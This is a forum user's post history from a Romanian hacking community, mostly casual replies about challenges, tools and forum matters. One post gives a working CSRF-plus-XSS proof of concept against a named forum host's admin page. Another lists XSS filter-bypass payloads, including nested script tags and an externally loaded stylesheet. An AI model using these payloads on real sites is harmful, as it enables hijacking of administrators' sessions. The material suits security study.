tw8
-
Posts
481 -
Joined
-
Last visited
-
Days Won
1
Posts posted by tw8
-
-
ce descopar ?! un mare BUG de la microsoft live
Nu l-ai "descoperit" tu:
http://www.webarea.ro/archive/index.php/t-139.html
mai astept pareri sa se simta si ficatu meu bneChiar crezi ca meriti laude pentru o minciuna ?
-
kwe, nu trebuie sa te multumesti doar cu asta. Hackpedia este axat mai mult pe programare/design, iar renslt ... prefer sa nu comentez .
Pacat ca se intampla asa cum ai zis si tu: oamenii isi fac prieteni pe forum si muta discutiile de aici pe Y!M. Totusi, mai exista si oameni care au continuat sa faca tutoriale (vladii, slick etc) in ciuda faptului ca sunt stresati de timp.
-
am ajuns la lvl 15:)
Bravo !
Apropo, o sa ai nevoie si de ceva germana la nivelul urmator (asta daca nu gasesti un transalator de la care sa intelegi) !
-
m-am blocat la nivelul 8. e o imagine care pare sa nu existe
Incearca din nou .. e foarte simplu . Uita-te la cum arata URL-ul la nivelele de dinainte si cum arata acum...exploreaza parent directory-ul acestui nivel
-
Salut! In caz ca va plictisiti, ati putea incerca acest challenge. Este format din 16 nivele, si necesita mai mult cunostinte de programare si mai putin de securitate (penultimul nivel). Dificultatea este medie (zic eu, desigur, asta dupa ce treci de primele multe nivele simple).
Cand il terminati, ar trebui sa va apara un ecran de genul :
P.S.: Daca il terminati (si vreti), lasa-ti-va semnatura in guestbook, si mentionati ca sunteti romani ... fiti mandrii de asta .
-
Si la ce te-ai referit cand ai spus double post?
DoublePost se chema cand faci 2 posturi unul dupa altul.
Offtopic se cheama ce facem noi aici .
-
Welcome. Oricine vrea sa invete e binevenit aici .
-
Si cum spuneam ... cand o sa faceti public grabberul?
Bafta in continuare
-
se poate afla ziua, luna si raspunsu la intrebarea secreta tot din cookie? Se cunoaste metoda sau nu s-a descoperit inca.
Din cate stiu eu, nu. Daca vrei sa citestimai multe, arunca un ochi pe aici.
-
Ce format e??? UTF sau ce?!
Apare asa pentru ca e scris cu diacritice( Ã , ã , Î , î, ª , º , Þ ) si probabil forumul de atunci avea suport pentru ele iar cel de acum nu mai are.
-
Interesant . Apropo, cookie-urile o sa fie "la comun" ?
-
ai folosit cumva asta cu autoit ?
Nu. Oricum, uite aici ceva ce ar putea sa te ajute.
Problema e ca scriptul are (inca) niste erori micute.
-
Acelasi lucru l-am spus si eu aici. Ai totala dreptate ... oricum, multi habar nu au cum se instaleaza un Linux odata ce l-ai downloadat (si nici nu se chinuie sa caute ) , dovada faptul ca pe mai toate forumurile de IT sunt posturi pe aceasta tema.
Bafta, si sa speram ca lucrurile lo sa se schimbe (in bine) ...
-
Incearca AutoIT. Toate uneltele sunt free, sintaxa e usoara, poate afisa imagini si gasesti suport din plin pe forumul lor.
-
Merci de info, nu stiam asta.
Pe viitor, o sa incerc sa aprofundez subiectul .
-
3xforum e grozav . Dupa XSS, trebuia sa vina,desigur, si CSRF.
Merge doar daca victima este logata pe un cont de admin/moderator, pentru ca apeleaza /admin_index.php , pagina vizibila doar adminilor si moderatorilor.
<form method="POST" action="http://*.3xforum.ro/admin_index.php" name="tw8">
<tr>
<td>Parola:</td>
<td><input type=text name=parola value='"><script>alert(document.cookie)</script>'</td>
<td><input type=submit value="GO"></td>
</tr></form>
<script>
document.tw8.submit();
</script>Bafta !
-
Doamne, asta da securitate .
-
nowledge]iar pe partea cealalta sa se faca o echipa speciala de "translatori" care sa traduca posturile.Vor fi traduse toate cap coada
Si cam cine crezi tu ca o sa aiba chef sa traduca atat ?
Time is $ ...
-
Nu ar fi mai simplu sa dai tu un edit la post si sa stergi linkul, decat sa astepti sa curete un mod/admin ?
Cat despre soft, il folosesc si eu si chiar mi se pare folositor si rapid.
-
E frumos banner-ul , dar ma obisnuisem cu cel vechi. Ar fi dragut daca ati putea face astfel incat sa ne alegem fiecare unul din cele 2 bannere (ca un fel de theme).
-
Gata cu off...
Oare de ce presimt ca o sa iasa urat ... lemme think .
Ontopic: Sa te lasi de droguri e greu, dar nu imposibil. Tatal meu a fumat timp de 24 de ani, si totusi acum a reusit sa se lase (are vreo 6 luni de cand s-a lasat, cred), lucru din ce in ce mai des la oamenii din zilele astea, din fericire. Eu nu fumez si nu am pus/nu voi pune niciodata gura pe tigare (sau alt drog).
-
Cred ca toti cei care ati vrut sa il faceti, ati avut destul timp la dispozitie . Acum, o sa sterg challenge-ul, pentru ca un XSS poate face multe .
Metode prin care puteati rezolva challenge-ul, era sa introduceti in input:
- From SharinGod : <LINK REL=stylesheet HREF=http://ha.ckers.org/xss.css>
From phreak: <script<script> alert(2) </script</script>
From me: tw8<script<script>var i; i =/t/;i=i+/w8/;i=i.substring(1,2) + i.substring(4,6);alert(i);</script</script>
Restul au fost, probabil, variatiuni pe aceeasi tema.
Bafta !
- From SharinGod : <LINK REL=stylesheet HREF=http://ha.ckers.org/xss.css>
-
Bine ai venit pe RST !
-
Dupa cateva minute de munca pe branci si chinuri ... amprenta vezi PM.
http://pandurii.evonet.ro/tw8.txt
Bafta !
Live.Com *BUG*
in Exploituri
Posted
Si live.com nu e o pagina de Internet? E un castron de ciorba' date=' sau ce e, ca nu mai inteleg ... Nu e vine mea ca nu stii sa te exprimi.
Deh, asa sunt eu de felul meu mai prost. Dar explica-mi si mie partea cu limbajul neadecvat ca nu prea inteleg .
P.S.: Poti sa imi dai warn si fara sa mai accepti aprobarea celorlalti. Inteleg cand nu sunt binevenit undeva .